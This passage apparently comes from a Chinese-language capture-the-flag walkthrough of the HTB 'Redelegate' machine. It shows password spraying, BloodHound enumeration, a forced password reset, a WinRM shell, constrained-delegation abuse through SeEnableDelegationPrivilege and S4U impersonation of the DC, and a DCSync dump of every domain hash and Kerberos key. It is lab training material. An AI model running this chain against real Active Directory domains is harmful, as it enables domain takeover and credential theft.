SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:hMFS4I0Kj8Rcd62vqi5X STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:cVkqz4bCM7kJRSNlgx2G STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
REDELEGATE\Marie.Curie Fall2024!
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc smb DC.redelegate.vl -u Marie.Curie -p Fall2024! --generate-tgt curie
SMB 10.129.130.206 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.130.206 445 DC [+] redelegate.vl\Marie.Curie:Fall2024!
SMB 10.129.130.206 445 DC [+] TGT saved to: curie.ccache
SMB 10.129.130.206 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=curie.ccache
1.4. bloodhound
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# bloodhound-ce-python -c All -u marie.curie -p 'Fall2024!' -d redelegate.vl -ns 10.129.130.206 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: redelegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.redelegate.vl
INFO: Testing resolved hostname connectivity dead:beef::1a5
INFO: Trying LDAP connection to dead:beef::1a5
INFO: Testing resolved hostname connectivity dead:beef::46d2:df40:9a0:20a
INFO: Trying LDAP connection to dead:beef::46d2:df40:9a0:20a
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.redelegate.vl
INFO: Testing resolved hostname connectivity dead:beef::1a5
INFO: Trying LDAP connection to dead:beef::1a5
INFO: Testing resolved hostname connectivity dead:beef::46d2:df40:9a0:20a
INFO: Trying LDAP connection to dead:beef::46d2:df40:9a0:20a
INFO: Found 12 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer: dc.redelegate.vl
WARNING: SID S-1-5-21-3745110700-3336928118-3915974013-1109 lookup failed, return status: STATUS_NONE_MAPPED
INFO: Done in 00M 35S
INFO: Compressing output into 20251013110449_bloodhound.zip
这可以直接去拿到机器FS01.REDELEGATE.VL的权限了
1.5. ForceChangePassword
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# bloodyAD --host 10.129.130.206 -d redelegate.vl -u Marie.Curie -p 'Fall2024!' set password 'HELEN.FROST' 'Admin123'
[+] Password changed successfully!
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc smb 10.129.130.206 -u 'HELEN.FROST' -p 'Admin123'
SMB 10.129.130.206 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.130.206 445 DC [+] redelegate.vl\HELEN.FROST:Admin123
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc winrm 10.129.130.206 -u 'HELEN.FROST' -p 'Admin123'
WINRM 10.129.130.206 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
WINRM 10.129.130.206 5985 DC [+] redelegate.vl\HELEN.FROST:Admin123 (Pwn3d!)
1.6. winrm
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# evil-winrm -i redelegate.vl -u 'HELEN.FROST' -p 'Admin123'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents>
*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> gc user.txt
61bcfc0804cfac802bc24e6edfb5f168
2. System
查看用户权限可以发现,用户被配置了 SeEnableDelegationPrivilege
*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
无约束委托(KUD) :配置了无约束委托的计算机会将连接到该计算机的所有用户的 TGT 存储在内存中。这样,该计算机就可以模拟该用户。要配置此功能,需要修改计算机的 userAccountControl 属性,使其包含 TRUSTED_FOR_DELEGATION 标志(这需要 SeEnableDelegationPrivilege 域权限)。
约束委派(KCD) :配置了约束委派的计算机将能够在另一台计算机上模拟任何用户。要配置此功能,需要修改对象的 userAccountControl 属性,使其包含 TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION 标志(需要 SeEnableDelegationPrivilege 权限),并将 msDS-AllowedToDelegateTo 属性设置为我们想要以任何用户身份进行身份验证的目标 spn。
这里可以先排除RBCD,因为RBCD不需要 SeEnableDelegationPrivilege
如果要利用非约束委派
我们需要一个机器帐户,为其配置无约束委派,然后强制域控制器向该机器进行身份验证。这需要能够添加机器帐户以及 DNS 条目(为了进行强制操作 - Kerberos 使用名称而不是 IP 地址)
这里利用约束委派,使我们这台计算机可以在DC上模拟ldap服务用户,
首先我们需要修改当前我们可以控制的计算机的UAC,为它添加 TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION,并且吧 msDS-AllowedToDelegateTo 的值设置为我们想要的模拟的身份,这里设置为cifs
*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> Set-ADComputer -Identity FS01 -Add @{'msDS-AllowedToDelegateTo'=@('cifs/dc.redelegate.vl')}
*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
验证一下
*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> Get-ADComputer FS01 -Properties msDS-AllowedToDelegateTo | Select-Object Name, msDS-AllowedToDelegateTo
Name msDS-AllowedToDelegateTo
---- ------------------------
FS01 {cifs/dc.redelegate.vl}
这里配置SPN为 cifs或者ldap,
然后修改机器的密码,方便请求ST
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# bloodyAD --host 10.129.130.206 -d redelegate.vl -u 'HELEN.FROST' -p 'Admin123' set password 'FS01$' Admin123
[+] Password changed successfully!
使用 impacket-getST 请求cifs票据(也可以用ldap,二者都可以让我们进行dcsync) 并使用s4u2self、proxy 执行模拟 DC
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# impacket-getST 'redelegate.vl/FS01$:Admin123' -spn cifs/dc.redelegate.vl -impersonate DC
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache
然后进行 DCSync 即可
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# impacket-getST 'redelegate.vl/FS01$:Admin123' -spn cifs/dc.redelegate.vl -impersonate DC
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# export KRB5CCNAME=DC@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# impacket-secretsdump -dc-ip 10.129.130.206 -k -no-pass DC.redelegate.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec17f7a2a4d96e177bfd101b94ffc0a7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
Helen.Frost:1106:aad3b435b51404eeaad3b435b51404ee:e45a314c664d40a227f9540121d1a29d:::
Michael.Pontiac:1107:aad3b435b51404eeaad3b435b51404ee:f37d004253f5f7525ef9840b43e5dad2:::
Mallory.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:980634f9aabfe13aec0111f64bda50c9:::
James.Dinkleberg:1109:aad3b435b51404eeaad3b435b51404ee:2716d39cc76e785bd445ca353714854d:::
Ryan.Cooper:1117:aad3b435b51404eeaad3b435b51404ee:062a12325a99a9da55f5070bf9c6fd2a:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:76a96946d9b465ec76a4b0b316785d6b:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:bfdff77d74764b0d4f940b7e9f684a61:::
FS01$:1103:aad3b435b51404eeaad3b435b51404ee:e45a314c664d40a227f9540121d1a29d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:db3a850aa5ede4cfacb57490d9b789b1ca0802ae11e09db5f117c1a8d1ccd173
Administrator:aes128-cts-hmac-sha1-96:b4fb863396f4c7a91c49ba0c0637a3ac
Administrator:des-cbc-md5:102f86737c3e9b2f
krbtgt:aes256-cts-hmac-sha1-96:bff2ae7dfc202b4e7141a440c00b91308c45ea918b123d7e97cba1d712e6a435
krbtgt:aes128-cts-hmac-sha1-96:9690508b681c1ec11e6d772c7806bc71
krbtgt:des-cbc-md5:b3ce46a1fe86cb6b
Christine.Flanders:aes256-cts-hmac-sha1-96:ceb5854b48f9b203b4aa9a8e0ac4af28b9dc49274d54e9f9a801902ea73f17ba
Christine.Flanders:aes128-cts-hmac-sha1-96:e0fa68a3060b9543d04a6f84462829d9
Christine.Flanders:des-cbc-md5:8980267623df2637
Marie.Curie:aes256-cts-hmac-sha1-96:616e01b81238b801b99c284e7ebcc3d2d739046fca840634428f83c2eb18dbe8
Marie.Curie:aes128-cts-hmac-sha1-96:daa48c455d1bd700530a308fb4020289
Marie.Curie:des-cbc-md5:256889c8bf678910
Helen.Frost:aes256-cts-hmac-sha1-96:7027bafdfba4d60dca47ae58401fead5691013dac8e23d3b5d786bfa3a42a003
Helen.Frost:aes128-cts-hmac-sha1-96:477c91b83664f6726619fa43fb2663e6
Helen.Frost:des-cbc-md5:5e467c7913fdc807
Michael.Pontiac:aes256-cts-hmac-sha1-96:eca3a512ed24bb1c37cd2886ec933544b0d3cfa900e92b96d056632a6920d050
Michael.Pontiac:aes128-cts-hmac-sha1-96:53456b952411ac9f2f3e2adf433ab443
Michael.Pontiac:des-cbc-md5:833dc82fab76c229
Mallory.Roberts:aes256-cts-hmac-sha1-96:c9ad270adea8746d753e881692e9a75b2487a6402e02c0c915eb8ac6c2c7ab6a
Mallory.Roberts:aes128-cts-hmac-sha1-96:40f22695256d0c49089f7eda2d0d1266
Mallory.Roberts:des-cbc-md5:cb25a726ae198686
James.Dinkleberg:aes256-cts-hmac-sha1-96:c6cade4bc132681117d47dd422dadc66285677aac3e65b3519809447e119458b
James.Dinkleberg:aes128-cts-hmac-sha1-96:35b2ea5440889148eafb6bed06eea4c1
James.Dinkleberg:des-cbc-md5:83ef38dc8cd90da2
Ryan.Cooper:aes256-cts-hmac-sha1-96:d94424fd2a046689ef7ce295cf562dce516c81697d2caf8d03569cd02f753b5f
Ryan.Cooper:aes128-cts-hmac-sha1-96:48ea408634f503e90ffb404031dc6c98
Ryan.Cooper:des-cbc-md5:5b19084a8f640e75
sql_svc:aes256-cts-hmac-sha1-96:1decdb85de78f1ed266480b2f349615aad51e4dc866816f6ac61fa67be5bb598
sql_svc:aes128-cts-hmac-sha1-96:88f45d60fa053d62160e8ea8f1d0231e
sql_svc:des-cbc-md5:970d6115d3f4a43b
DC$:aes256-cts-hmac-sha1-96:0e50c0a6146a62e4473b0a18df2ba4875076037ca1c33503eb0c7218576bb22b
DC$:aes128-cts-hmac-sha1-96:7695e6b660218de8d911840d42e1a498
DC$:des-cbc-md5:3db913751c434f61
FS01$:aes256-cts-hmac-sha1-96:082133e929c5cf54148c6c890e1645745d704b695a8791aa57aec97ae588cf9d
FS01$:aes128-cts-hmac-sha1-96:1261dbf9f7577fe221e256d35bff5b3a
FS01$:des-cbc-md5:04bc3e13cd6b37c1
[*] Cleaning up...